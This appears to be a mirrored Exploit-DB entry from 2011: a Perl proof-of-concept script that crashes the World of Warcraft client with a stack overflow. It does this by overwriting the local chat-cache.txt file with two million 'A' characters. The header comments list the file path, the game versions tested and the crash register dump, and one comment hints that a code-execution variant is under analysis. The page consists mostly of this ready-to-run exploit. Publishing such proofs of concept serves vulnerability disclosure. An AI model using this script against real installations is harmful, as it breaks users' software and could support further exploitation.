World Of Warcraft – ‘chat-cache.txt’ Local Stack Overflow Denial of Service

  • 作者: BSOD Digital
    日期: 2011-09-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17781/
  • #!/usr/bin/perl
    #
    #Exploit Title:
    #World Of Warcraft Local Stack Overflow Dos Exploit (chat-cache.txt)
    #
    #Date: 04/09/2011
    #
    #Author: BSOD Digital (Fabien DROMAS)
    #
    #Other details:"Code Exec" Exploit in analysis.
    #
    #Tests:
    #OS: Windows 7
    #Versions: burning crusade,cataclism, Demo Version.
    #
    #Path:
    #world of warcraft > WTF > account > file (numbers) > server_file > account_name_file > chat-cache.txt
    #
    #Error:
    #This application has encountered a critical error:
    #
    #ERROR #132 (0x85100084) Fatal exception!
    #
    #Program:	D:\World of Warcraft\Wow.exe
    #ProcessID:	92024
    #Exception:	0xC00000FD (STACK_OVERFLOW) at 0023:0109DA97
    #
    #Registers:
    #----------------------------------------
    #x86 Registers
    #----------------------------------------
    #
    #EAX=000F2000EBX=1BD920D8ECX=000CC22CEDX=00000000ESI=0012366F
    #EDI=00000000EBP=001EFC5CESP=001EF8A4EIP=0109DA97FLG=00010206
    #CS =0023DS =002BES =002BSS =002BFS =0053GS =002B
    
    
    my $file = "chat-cache.txt";
    my $dos_junk = "A" x 2000000;
    open($File, ">$file");
    print $File $dos_junk;
    close($File);